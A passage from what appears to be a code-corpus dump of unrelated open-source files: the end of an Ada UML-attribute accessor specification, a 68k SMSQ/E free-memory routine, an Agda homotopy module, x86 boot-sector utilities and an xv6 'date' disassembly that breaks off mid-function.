AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionInputPin => TypedElement::type -- ActivityParameterNode => TypedElement::type -- CentralBufferNode => TypedElement::type -- CollaborationUse => CollaborationUse::type -- Connector => Connector::type -- DataStoreNode => TypedElement::type -- Duration => TypedElement::type -- DurationInterval => TypedElement::type -- ExpansionNode => TypedElement::type -- Expression => TypedElement::type -- ExtensionEnd => ExtensionEnd::type -- InputPin => TypedElement::type -- InstanceValue => TypedElement::type -- Interval => TypedElement::type -- LiteralBoolean => TypedElement::type -- LiteralInteger => TypedElement::type -- LiteralNull => TypedElement::type -- LiteralReal => TypedElement::type -- LiteralString => TypedElement::type -- LiteralUnlimitedNatural => TypedElement::type -- OpaqueExpression => TypedElement::type -- Operation => Operation::type -- OutputPin => TypedElement::type -- Parameter => TypedElement::type -- Port => TypedElement::type -- Property => TypedElement::type -- StringExpression => TypedElement::type -- TimeExpression => TypedElement::type -- TimeInterval => TypedElement::type -- ValuePin => TypedElement::type -- Variable => TypedElement::type function Internal_Get_Unmarshall_Type (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Unmarshall_Type (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UnmarshallAction => UnmarshallAction::unmarshallType function Internal_Get_Upper (Self : AMF.Internals.AMF_Element) return AMF.Optional_Unlimited_Natural; procedure Internal_Set_Upper (Self : AMF.Internals.AMF_Element; To : AMF.Optional_Unlimited_Natural); -- ActionInputPin => MultiplicityElement::upper -- ConnectorEnd => MultiplicityElement::upper -- ExtensionEnd => MultiplicityElement::upper -- InputPin => MultiplicityElement::upper -- Operation => Operation::upper -- OutputPin => MultiplicityElement::upper -- Parameter => MultiplicityElement::upper -- Port => MultiplicityElement::upper -- Property => MultiplicityElement::upper -- ValuePin => MultiplicityElement::upper -- Variable => MultiplicityElement::upper function Internal_Get_Upper_Bound (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Upper_Bound (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionInputPin => ObjectNode::upperBound -- ActivityParameterNode => ObjectNode::upperBound -- CentralBufferNode => ObjectNode::upperBound -- DataStoreNode => ObjectNode::upperBound -- ExpansionNode => ObjectNode::upperBound -- InputPin => ObjectNode::upperBound -- OutputPin => ObjectNode::upperBound -- ValuePin => ObjectNode::upperBound function Internal_Get_Upper_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Upper_Value (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionInputPin => MultiplicityElement::upperValue -- ConnectorEnd => MultiplicityElement::upperValue -- ExtensionEnd => MultiplicityElement::upperValue -- InputPin => MultiplicityElement::upperValue -- OutputPin => MultiplicityElement::upperValue -- Parameter => MultiplicityElement::upperValue -- Port => MultiplicityElement::upperValue -- Property => MultiplicityElement::upperValue -- ValuePin => MultiplicityElement::upperValue -- Variable => MultiplicityElement::upperValue function Internal_Get_Use_Case (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::useCase -- Actor => Classifier::useCase -- Artifact => Classifier::useCase -- Association => Classifier::useCase -- AssociationClass => Classifier::useCase -- Class => Classifier::useCase -- Collaboration => Classifier::useCase -- CommunicationPath => Classifier::useCase -- Component => Classifier::useCase -- DataType => Classifier::useCase -- DeploymentSpecification => Classifier::useCase -- Device => Classifier::useCase -- Enumeration => Classifier::useCase -- ExecutionEnvironment => Classifier::useCase -- Extension => Classifier::useCase -- FunctionBehavior => Classifier::useCase -- InformationItem => Classifier::useCase -- Interaction => Classifier::useCase -- Interface => Classifier::useCase -- Node => Classifier::useCase -- OpaqueBehavior => Classifier::useCase -- PrimitiveType => Classifier::useCase -- ProtocolStateMachine => Classifier::useCase -- Signal => Classifier::useCase -- StateMachine => Classifier::useCase -- Stereotype => Classifier::useCase -- UseCase => Classifier::useCase function Internal_Get_Use_Case (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Use_Case (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionPoint => ExtensionPoint::useCase function Internal_Get_Utilized_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Utilized_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Manifestation => Manifestation::utilizedElement function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Value (Self : AMF.Internals.AMF_Element; To : Boolean); -- LiteralBoolean => LiteralBoolean::value function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return Integer; procedure Internal_Set_Value (Self : AMF.Internals.AMF_Element; To : Integer); -- LiteralInteger => LiteralInteger::value function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return AMF.Real; procedure Internal_Set_Value (Self : AMF.Internals.AMF_Element; To : AMF.Real); -- LiteralReal => LiteralReal::value function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Value (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- LiteralString => LiteralString::value function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return AMF.Unlimited_Natural; procedure Internal_Set_Value (Self : AMF.Internals.AMF_Element; To : AMF.Unlimited_Natural); -- LiteralUnlimitedNatural => LiteralUnlimitedNatural::value function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Slot => Slot::value function Internal_Get_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Value (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AddStructuralFeatureValueAction => WriteStructuralFeatureAction::value -- AddVariableValueAction => WriteVariableAction::value -- LinkEndCreationData => LinkEndData::value -- LinkEndData => LinkEndData::value -- LinkEndDestructionData => LinkEndData::value -- QualifierValue => QualifierValue::value -- RemoveStructuralFeatureValueAction => WriteStructuralFeatureAction::value -- RemoveVariableValueAction => WriteVariableAction::value -- ValuePin => ValuePin::value -- ValueSpecificationAction => ValueSpecificationAction::value function Internal_Get_Variable (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Activity::variable -- ConditionalNode => StructuredActivityNode::variable -- ExpansionRegion => StructuredActivityNode::variable -- LoopNode => StructuredActivityNode::variable -- SequenceNode => StructuredActivityNode::variable -- StructuredActivityNode => StructuredActivityNode::variable function Internal_Get_Variable (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Variable (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AddVariableValueAction => VariableAction::variable -- ClearVariableAction => VariableAction::variable -- ReadVariableAction => VariableAction::variable -- RemoveVariableValueAction => VariableAction::variable function Internal_Get_Viewpoint (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Viewpoint (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Model => Model::viewpoint function Internal_Get_Visibility (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Visibility_Kind; procedure Internal_Set_Visibility (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Visibility_Kind); -- ElementImport => ElementImport::visibility -- PackageImport => PackageImport::visibility function Internal_Get_Visibility (Self : AMF.Internals.AMF_Element) return AMF.UML.Optional_UML_Visibility_Kind; procedure Internal_Set_Visibility (Self : AMF.Internals.AMF_Element; To : AMF.UML.Optional_UML_Visibility_Kind); -- Abstraction => NamedElement::visibility -- AcceptCallAction => NamedElement::visibility -- AcceptEventAction => NamedElement::visibility -- ActionExecutionSpecification => NamedElement::visibility -- ActionInputPin => NamedElement::visibility -- Activity => NamedElement::visibility -- ActivityFinalNode => NamedElement::visibility -- ActivityParameterNode => NamedElement::visibility -- ActivityPartition => NamedElement::visibility -- Actor => NamedElement::visibility -- AddStructuralFeatureValueAction => NamedElement::visibility -- AddVariableValueAction => NamedElement::visibility -- AnyReceiveEvent => NamedElement::visibility -- Artifact => NamedElement::visibility -- Association => NamedElement::visibility -- AssociationClass => NamedElement::visibility -- BehaviorExecutionSpecification => NamedElement::visibility -- BroadcastSignalAction => NamedElement::visibility -- CallBehaviorAction => NamedElement::visibility -- CallEvent => NamedElement::visibility -- CallOperationAction => NamedElement::visibility -- CentralBufferNode => NamedElement::visibility -- ChangeEvent => NamedElement::visibility -- Class => NamedElement::visibility -- ClearAssociationAction => NamedElement::visibility -- ClearStructuralFeatureAction => NamedElement::visibility -- ClearVariableAction => NamedElement::visibility -- Collaboration => NamedElement::visibility -- CollaborationUse => NamedElement::visibility -- CombinedFragment => NamedElement::visibility -- CommunicationPath => NamedElement::visibility -- Component => NamedElement::visibility -- ComponentRealization => NamedElement::visibility -- ConditionalNode => NamedElement::visibility -- ConnectionPointReference => NamedElement::visibility -- Connector => NamedElement::visibility -- ConsiderIgnoreFragment => NamedElement::visibility -- Constraint => NamedElement::visibility -- Continuation => NamedElement::visibility -- ControlFlow => NamedElement::visibility -- CreateLinkAction => NamedElement::visibility -- CreateLinkObjectAction => NamedElement::visibility -- CreateObjectAction => NamedElement::visibility -- UMLActivityDiagram => NamedElement::visibility -- UMLClassDiagram => NamedElement::visibility -- UMLComponentDiagram => NamedElement::visibility -- UMLCompositeStructureDiagram => NamedElement::visibility -- UMLDeploymentDiagram => NamedElement::visibility -- UMLInteractionDiagram => NamedElement::visibility -- UMLObjectDiagram => NamedElement::visibility -- UMLPackageDiagram => NamedElement::visibility -- UMLProfileDiagram => NamedElement::visibility -- UMLStateMachineDiagram => NamedElement::visibility -- UMLStyle => NamedElement::visibility -- UMLUseCaseDiagram => NamedElement::visibility -- DataStoreNode => NamedElement::visibility -- DataType => NamedElement::visibility -- DecisionNode => NamedElement::visibility -- Dependency => NamedElement::visibility -- Deployment => NamedElement::visibility -- DeploymentSpecification => NamedElement::visibility -- DestroyLinkAction => NamedElement::visibility -- DestroyObjectAction => NamedElement::visibility -- DestructionOccurrenceSpecification => NamedElement::visibility -- Device => NamedElement::visibility -- Duration => NamedElement::visibility -- DurationConstraint => NamedElement::visibility -- DurationInterval => NamedElement::visibility -- DurationObservation => NamedElement::visibility -- Enumeration => NamedElement::visibility -- EnumerationLiteral => NamedElement::visibility -- ExecutionEnvironment => NamedElement::visibility -- ExecutionOccurrenceSpecification => NamedElement::visibility -- ExpansionNode => NamedElement::visibility -- ExpansionRegion => NamedElement::visibility -- Expression => NamedElement::visibility -- Extend => NamedElement::visibility -- Extension => NamedElement::visibility -- ExtensionEnd => NamedElement::visibility -- ExtensionPoint => NamedElement::visibility -- FinalState => NamedElement::visibility -- FlowFinalNode => NamedElement::visibility -- ForkNode => NamedElement::visibility -- FunctionBehavior => NamedElement::visibility -- Gate => NamedElement::visibility -- GeneralOrdering => NamedElement::visibility -- GeneralizationSet => NamedElement::visibility -- Include => NamedElement::visibility -- InformationFlow => NamedElement::visibility -- InformationItem => NamedElement::visibility -- InitialNode => NamedElement::visibility -- InputPin => NamedElement::visibility -- InstanceSpecification => NamedElement::visibility -- InstanceValue => NamedElement::visibility -- Interaction => NamedElement::visibility -- InteractionConstraint => NamedElement::visibility -- InteractionOperand => NamedElement::visibility -- InteractionUse => NamedElement::visibility -- Interface => NamedElement::visibility -- InterfaceRealization => NamedElement::visibility -- InterruptibleActivityRegion => NamedElement::visibility -- Interval => NamedElement::visibility -- IntervalConstraint => NamedElement::visibility -- JoinNode => NamedElement::visibility -- Lifeline => NamedElement::visibility -- LiteralBoolean => NamedElement::visibility -- LiteralInteger => NamedElement::visibility -- LiteralNull => NamedElement::visibility -- LiteralReal => NamedElement::visibility -- LiteralString => NamedElement::visibility -- LiteralUnlimitedNatural => NamedElement::visibility -- LoopNode => NamedElement::visibility -- Manifestation => NamedElement::visibility -- MergeNode => NamedElement::visibility -- Message => NamedElement::visibility -- MessageOccurrenceSpecification => NamedElement::visibility -- Model => NamedElement::visibility -- Node => NamedElement::visibility -- ObjectFlow => NamedElement::visibility -- OccurrenceSpecification => NamedElement::visibility -- OpaqueAction => NamedElement::visibility -- OpaqueBehavior => NamedElement::visibility -- OpaqueExpression => NamedElement::visibility -- Operation => NamedElement::visibility -- OutputPin => NamedElement::visibility -- Package => NamedElement::visibility -- Parameter => NamedElement::visibility -- ParameterSet => NamedElement::visibility -- PartDecomposition => NamedElement::visibility -- Port => NamedElement::visibility -- PrimitiveType => NamedElement::visibility -- Profile => NamedElement::visibility -- Property => NamedElement::visibility -- ProtocolStateMachine => NamedElement::visibility -- ProtocolTransition => NamedElement::visibility -- Pseudostate => NamedElement::visibility -- RaiseExceptionAction => NamedElement::visibility -- ReadExtentAction => NamedElement::visibility -- ReadIsClassifiedObjectAction => NamedElement::visibility -- ReadLinkAction => NamedElement::visibility -- ReadLinkObjectEndAction => NamedElement::visibility -- ReadLinkObjectEndQualifierAction => NamedElement::visibility -- ReadSelfAction => NamedElement::visibility -- ReadStructuralFeatureAction => NamedElement::visibility -- ReadVariableAction => NamedElement::visibility -- Realization => NamedElement::visibility -- Reception => NamedElement::visibility -- ReclassifyObjectAction => NamedElement::visibility -- RedefinableTemplateSignature => NamedElement::visibility -- ReduceAction => NamedElement::visibility -- Region => NamedElement::visibility -- RemoveStructuralFeatureValueAction => NamedElement::visibility -- RemoveVariableValueAction => NamedElement::visibility -- ReplyAction => NamedElement::visibility -- SendObjectAction => NamedElement::visibility -- SendSignalAction => NamedElement::visibility -- SequenceNode => NamedElement::visibility -- Signal => NamedElement::visibility -- SignalEvent => NamedElement::visibility -- StartClassifierBehaviorAction => NamedElement::visibility -- StartObjectBehaviorAction => NamedElement::visibility -- State => NamedElement::visibility -- StateInvariant => NamedElement::visibility -- StateMachine => NamedElement::visibility -- Stereotype => NamedElement::visibility -- StringExpression => NamedElement::visibility -- StructuredActivityNode => NamedElement::visibility -- Substitution => NamedElement::visibility -- TestIdentityAction => NamedElement::visibility -- TimeConstraint => NamedElement::visibility -- TimeEvent => NamedElement::visibility -- TimeExpression => NamedElement::visibility -- TimeInterval => NamedElement::visibility -- TimeObservation => NamedElement::visibility -- Transition => NamedElement::visibility -- Trigger => NamedElement::visibility -- UnmarshallAction => NamedElement::visibility -- Usage => NamedElement::visibility -- UseCase => NamedElement::visibility -- ValuePin => NamedElement::visibility -- ValueSpecificationAction => NamedElement::visibility -- Variable => NamedElement::visibility function Internal_Get_Waypoint (Self : AMF.Internals.AMF_Element) return AMF.DC.Sequence_Of_DC_Point; -- UMLEdge => Edge::waypoint function Internal_Get_Weight (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Weight (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ControlFlow => ActivityEdge::weight -- ObjectFlow => ActivityEdge::weight function Internal_Get_When (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_When (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TimeEvent => TimeEvent::when end AMF.Internals.Tables.UML_Attributes;
smsq/mem/free.asm
olifink/smsqe
0
831
* Find free space in common heap / TPA V3.10  1986 <NAME> QJUMP * 2002 <NAME> * * 2002-05-20 3.10 Previously just returned the size of the common heap gap, * now scans the free block list of chp and tpa for the * largest one (MK) * section mem * xdef mem_frch xdef mem_frtp * xref sms_rte * include dev8_keys_sys include dev8_keys_sbt include dev8_keys_chp * * d0 rs 0, no errors * d1 r free space, limited to 64K default * a6 c p pointer to system vars * * all other registers preserved * ************************************************* * NOTE: returns directly through SMS return ************************************************* * mem_frtp mem_frch move.l sys_sbab(a6),d1 ; first calculate gap sub.l sys_fsbb(a6),d1 sub.l #$400,d1 ; two slave blocks spare bgt.s mfr_scanlists moveq #0,d1 ; no room in gap mfr_scanlists lea sys_chpf-chp_nxfr(a6),a2 ; scan free space lists bsr.s mfr_scan lea sys_tpaf-chp_nxfr(a6),a2 bsr.s mfr_scan cmp.l sys_mxfr(a6),d1 ; more than max? ble.s mfr_ok ; ... no move.l sys_mxfr(a6),d1 mfr_ok moveq #0,d0 bra.l sms_rte mfr_scan move.l chp_nxfr(a2),d0 ; next beq.s mfr_scanend add.l d0,a2 move.l chp_len(a2),d0 ; length cmp.l d0,d1 bgt.s mfr_scan move.l d0,d1 bra.s mfr_scan mfr_scanend rts end
src/Util/HoTT/Homotopy.agda
JLimperg/msc-thesis-code
5
3822
{-# OPTIONS --without-K --safe #-} module Util.HoTT.Homotopy where open import Relation.Binary using (IsEquivalence) open import Util.Prelude open import Util.Relation.Binary.PropositionalEquality using (cong-app) module _ {α β} {A : Set α} {B : A → Set β} where _~_ : (f g : ∀ a → B a) → Set (α ⊔ℓ β) f ~ g = ∀ a → f a ≡ g a ~-refl : ∀ {f} → f ~ f ~-refl a = refl ~-sym : ∀ {f g} → f ~ g → g ~ f ~-sym f~g a = sym (f~g a) ~-trans : ∀ {f g h} → f ~ g → g ~ h → f ~ h ~-trans f~g g~h a = trans (f~g a) (g~h a) ~-IsEquivalence : IsEquivalence _~_ ~-IsEquivalence = record { refl = ~-refl ; sym = ~-sym ; trans = ~-trans } ≡→~ : ∀ {f g} → f ≡ g → f ~ g ≡→~ = cong-app
utility.asm
olawlor/OS-L
0
22136
; Debugging and I/O utility functions ; See also the utility functions in boot.S, like printchar ; 16 bit x86 assembly language for NASM ; Dr. <NAME>, <EMAIL>, 2019-01-29 (Public Domain) ; Print eax as 8 hex digits onscreen ; Trashes: none printhex32: push cx mov cl,8*4 ; bit counter: print 8 hex digits, at 4 bits each jmp printhex_raw_start printhex8: ; print al as 2 hex digits onscreen push cx mov cl,2*4 ; 2 hex digits printhex_raw_start: sub cl,4 ; move down 1 hex digit = 4 bits push eax ; print hex digit from bit number cl shr eax,cl ; shift ax's high bits down first and al,0xF ; extract the low hex digit cmp al,9 jbe print_number_only add al,'A'-10-'0' ; print as ASCII letter print_number_only: add al,'0' ; convert number to ascii call printchar pop eax cmp cl,0 jne printhex_raw_start ; repeat until cl == 0 pop cx ret ; Read one char from the user, return ASCII in al / scancode in ah ; Trashes: returns in ax readchar: xor ax, ax; set ax to zero (wait for keypress) int 0x16 ; Wait for a keypress call printchar ; Always echo user input ret ; Read hex digits from the user until hits spacebar, return value in eax ; Trashes: ax, dx readhex: xor edx, edx ; value we're accumulating read_hex_loop: call readchar cmp al,' ' ; we hit a space character je read_hex_done cmp al,13 ; we hit a (DOS) newline character je read_hex_done ; Else it's a real char: start by shifting old chars up shl edx,4 ; 4 bits per hex char cmp al,'9' jle read_hex_number ; else it's a letter cmp al,'F' jle read_hex_uppercase ; lowercase sub al,'a'-10 jmp read_hex_add read_hex_uppercase: ; uppercase sub al,'A'-10 jmp read_hex_add read_hex_number: ; it's a number sub al,'0' read_hex_add: movzx eax,al ; sign-extend al from 8 bits to 16 bits add edx,eax jmp read_hex_loop read_hex_done: mov eax,edx ; return result in eax ret ; Crash handling crash: call debugdump jmp hang ; Dump all registers, for debugging ; trashes: none debugdump: call println push eax push ebx push ecx push esi mov bx,'AX' call printreg pop eax ; grab pushed copy of bx push eax ; re-save the copy mov bx,'BX' call printreg mov eax,ecx mov bx,'CX' call printreg mov eax,edx mov bx,'DX' call printreg call println mov eax,esp mov bx,'SP' call printreg mov eax,ebp mov bx,'BP' call printreg mov eax,esi mov bx,'SI' call printreg mov eax,edi mov bx,'DI' call printreg call println mov eax,0 mov ax,ss mov bx,'SS' call printreg mov si,sp mov ax,WORD[si+2+16] ; dig down in stack to saved address (we use 16 bytes) mov bx,'IP' call printreg mov ax,cs mov bx,'CS' call printreg mov ax,ds mov bx,'DS' call printreg mov ax,es mov bx,'ES' call printreg call println pop esi pop ecx pop ebx pop eax ret ; Input: bl = char name of register. eax = value of register printreg: push eax push bx mov al,bl call printchar pop bx mov al,bh call printchar mov al,'=' call printchar pop eax call printhex32 mov al,' ' call printchar ret ; Restart the machine, by jumping to the BIOS's power-on code. reboot: jmp 0xffff:0x0000 ; Jump to BIOS reset code
date.asm
ngp111/xv6-SPOS-Proj
0
82396
_date: file format elf32-i386 Disassembly of section .text: 00000000 <main>: void utc_day(void); void day(char *); // main int main(int argc, char *argv[]) { 0: 8d 4c 24 04 lea 0x4(%esp),%ecx 4: 83 e4 f0 and $0xfffffff0,%esp 7: ff 71 fc pushl -0x4(%ecx) a: 55 push %ebp b: 89 e5 mov %esp,%ebp d: 53 push %ebx e: 51 push %ecx f: 8b 01 mov (%ecx),%eax 11: 8b 59 04 mov 0x4(%ecx),%ebx // if user only types date in the command prompt if(argc==1) 14: 83 f8 01 cmp $0x1,%eax 17: 74 3d je 56 <main+0x56> today(); // this function prints today's date and current time (IST format) else { // if user uses -d option with the date command if((argc==3)&&(strcmp("-d",*(argv+1))==0)) 19: 83 f8 03 cmp $0x3,%eax 1c: 74 3f je 5d <main+0x5d> day(*(argv+2)); // this function checks which option is chosen by user // it then calls a suitable function to implement that option // if user uses -u option else if((argc==2)&&(strcmp("-u",*(argv+1))==0)) 1e: 83 f8 02 cmp $0x2,%eax 21: 74 16 je 39 <main+0x39> utc_day(); // this function prints today's date and current time (UTC format) // if the user types an invalid command else printf(1,"Invalid command. Please try again.\n"); 23: 50 push %eax 24: 50 push %eax 25: 68 54 13 00 00 push $0x1354 2a: 6a 01 push $0x1 2c: e8 cf 0e 00 00 call f00 <printf> 31: 83 c4 10 add $0x10,%esp } exit(); 34: e8 69 0d 00 00 call da2 <exit> else if((argc==2)&&(strcmp("-u",*(argv+1))==0)) 39: 52 push %edx 3a: 52 push %edx 3b: ff 73 04 pushl 0x4(%ebx) 3e: 68 fe 12 00 00 push $0x12fe 43: e8 38 0b 00 00 call b80 <strcmp> 48: 83 c4 10 add $0x10,%esp 4b: 85 c0 test %eax,%eax 4d: 75 d4 jne 23 <main+0x23> utc_day(); // this function prints today's date and current time (UTC format) 4f: e8 0c 0a 00 00 call a60 <utc_day> 54: eb de jmp 34 <main+0x34> today(); // this function prints today's date and current time (IST format) 56: e8 65 06 00 00 call 6c0 <today> 5b: eb d7 jmp 34 <main+0x34> if((argc==3)&&(strcmp("-d",*(argv+1))==0)) 5d: 51 push %ecx 5e: 51 push %ecx 5f: ff 73 04 pushl 0x4(%ebx) 62: 68 fb 12 00 00 push $0x12fb 67: e8 14 0b 00 00 call b80 <strcmp> 6c: 83 c4 10 add $0x10,%esp 6f: 85 c0 test %eax,%eax 71: 75 b0 jne 23 <main+0x23> day(*(argv+2)); // this function checks which option is chosen by user 73: 83 ec 0c sub $0xc,%esp 76: ff 73 08 pushl 0x8(%ebx) 79: e8 82 0a 00 00 call b00 <day> 7e: 83 c4 10 add $0x10,%esp 81: eb b1 jmp 34 <main+0x34> 83: 66 90 xchg %ax,%ax 85: 66 90 xchg %ax,%ax 87: 66 90 xchg %ax,%ax 89: 66 90 xchg %ax,%ax 8b: 66 90 xchg %ax,%ax 8d: 66 90 xchg %ax,%ax 8f: 90 nop 00000090 <check_leap.part.0>: int check_leap(int x) { int flag = 0; if(x%400==0) flag = 1; else if(x%100==0) 90: ba 1f 85 eb 51 mov $0x51eb851f,%edx int check_leap(int x) 95: 89 c1 mov %eax,%ecx 97: 55 push %ebp else if(x%100==0) 98: f7 ea imul %edx int check_leap(int x) 9a: 89 e5 mov %esp,%ebp else if(x%100==0) 9c: 89 d0 mov %edx,%eax 9e: 89 ca mov %ecx,%edx a0: c1 fa 1f sar $0x1f,%edx a3: c1 f8 05 sar $0x5,%eax a6: 29 d0 sub %edx,%eax a8: 89 ca mov %ecx,%edx aa: 6b c0 64 imul $0x64,%eax,%eax ad: 29 c2 sub %eax,%edx af: 89 d0 mov %edx,%eax b1: 74 08 je bb <check_leap.part.0+0x2b> flag = 0; else if(x%4==0) b3: 31 c0 xor %eax,%eax b5: 83 e1 03 and $0x3,%ecx b8: 0f 94 c0 sete %al flag = 1; else flag = 0; return(flag); } bb: 5d pop %ebp bc: c3 ret bd: 8d 76 00 lea 0x0(%esi),%esi 000000c0 <power>: { c0: 55 push %ebp c1: 89 e5 mov %esp,%ebp c3: 57 push %edi c4: 56 push %esi c5: 53 push %ebx c6: 83 ec 0c sub $0xc,%esp for(int i=0;i<y;i++) c9: 8b 45 0c mov 0xc(%ebp),%eax cc: 85 c0 test %eax,%eax ce: 7e 58 jle 128 <power+0x68> d0: 8b 45 08 mov 0x8(%ebp),%eax long long res = 1; d3: 31 d2 xor %edx,%edx for(int i=0;i<y;i++) d5: 31 db xor %ebx,%ebx long long res = 1; d7: 89 55 ec mov %edx,-0x14(%ebp) da: 89 c7 mov %eax,%edi dc: 89 c6 mov %eax,%esi de: b8 01 00 00 00 mov $0x1,%eax e3: c1 ff 1f sar $0x1f,%edi e6: 89 45 e8 mov %eax,-0x18(%ebp) e9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi res = res * x; f0: 8b 4d ec mov -0x14(%ebp),%ecx f3: 8b 55 e8 mov -0x18(%ebp),%edx for(int i=0;i<y;i++) f6: 83 c3 01 add $0x1,%ebx res = res * x; f9: 8b 45 e8 mov -0x18(%ebp),%eax fc: 0f af d7 imul %edi,%edx ff: 0f af ce imul %esi,%ecx 102: 01 d1 add %edx,%ecx 104: f7 e6 mul %esi 106: 89 55 ec mov %edx,-0x14(%ebp) 109: 01 4d ec add %ecx,-0x14(%ebp) for(int i=0;i<y;i++) 10c: 39 5d 0c cmp %ebx,0xc(%ebp) res = res * x; 10f: 89 45 e8 mov %eax,-0x18(%ebp) for(int i=0;i<y;i++) 112: 75 dc jne f0 <power+0x30> 114: 8b 45 e8 mov -0x18(%ebp),%eax 117: 8b 55 ec mov -0x14(%ebp),%edx } 11a: 83 c4 0c add $0xc,%esp 11d: 5b pop %ebx 11e: 5e pop %esi 11f: 5f pop %edi 120: 5d pop %ebp 121: c3 ret 122: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 128: 83 c4 0c add $0xc,%esp long long res = 1; 12b: b8 01 00 00 00 mov $0x1,%eax 130: 31 d2 xor %edx,%edx } 132: 5b pop %ebx 133: 5e pop %esi 134: 5f pop %edi 135: 5d pop %ebp 136: c3 ret 137: 89 f6 mov %esi,%esi 139: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000140 <check_leap>: { 140: 55 push %ebp if(x%400==0) 141: ba 1f 85 eb 51 mov $0x51eb851f,%edx { 146: 89 e5 mov %esp,%ebp 148: 8b 4d 08 mov 0x8(%ebp),%ecx if(x%400==0) 14b: 89 c8 mov %ecx,%eax 14d: f7 ea imul %edx 14f: 89 c8 mov %ecx,%eax 151: c1 f8 1f sar $0x1f,%eax 154: c1 fa 07 sar $0x7,%edx 157: 29 c2 sub %eax,%edx 159: 69 d2 90 01 00 00 imul $0x190,%edx,%edx 15f: 39 d1 cmp %edx,%ecx 161: 74 0d je 170 <check_leap+0x30> } 163: 5d pop %ebp 164: 89 c8 mov %ecx,%eax 166: e9 25 ff ff ff jmp 90 <check_leap.part.0> 16b: 90 nop 16c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 170: b8 01 00 00 00 mov $0x1,%eax 175: 5d pop %ebp 176: c3 ret 177: 89 f6 mov %esi,%esi 179: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 00000180 <month_name>: // this function prints the name of the month of the year void month_name(int x) { 180: 55 push %ebp 181: 89 e5 mov %esp,%ebp 183: 83 ec 08 sub $0x8,%esp 186: 8b 45 08 mov 0x8(%ebp),%eax switch(x) 189: 83 f8 0c cmp $0xc,%eax 18c: 77 1c ja 1aa <month_name+0x2a> 18e: ff 24 85 04 13 00 00 jmp *0x1304(,%eax,4) 195: 8d 76 00 lea 0x0(%esi),%esi break; case 10:printf(1," Oct"); break; case 11:printf(1," Nov"); break; case 12:printf(1," Dec"); 198: 83 ec 08 sub $0x8,%esp 19b: 68 8f 12 00 00 push $0x128f 1a0: 6a 01 push $0x1 1a2: e8 59 0d 00 00 call f00 <printf> break; 1a7: 83 c4 10 add $0x10,%esp } } 1aa: c9 leave 1ab: c3 ret 1ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 1:printf(1," Jan"); 1b0: 83 ec 08 sub $0x8,%esp 1b3: 68 58 12 00 00 push $0x1258 1b8: 6a 01 push $0x1 1ba: e8 41 0d 00 00 call f00 <printf> break; 1bf: 83 c4 10 add $0x10,%esp } 1c2: c9 leave 1c3: c3 ret 1c4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 2:printf(1," Feb"); 1c8: 83 ec 08 sub $0x8,%esp 1cb: 68 5d 12 00 00 push $0x125d 1d0: 6a 01 push $0x1 1d2: e8 29 0d 00 00 call f00 <printf> break; 1d7: 83 c4 10 add $0x10,%esp } 1da: c9 leave 1db: c3 ret 1dc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 3:printf(1," Mar"); 1e0: 83 ec 08 sub $0x8,%esp 1e3: 68 62 12 00 00 push $0x1262 1e8: 6a 01 push $0x1 1ea: e8 11 0d 00 00 call f00 <printf> break; 1ef: 83 c4 10 add $0x10,%esp } 1f2: c9 leave 1f3: c3 ret 1f4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 4:printf(1," Apr"); 1f8: 83 ec 08 sub $0x8,%esp 1fb: 68 67 12 00 00 push $0x1267 200: 6a 01 push $0x1 202: e8 f9 0c 00 00 call f00 <printf> break; 207: 83 c4 10 add $0x10,%esp } 20a: c9 leave 20b: c3 ret 20c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 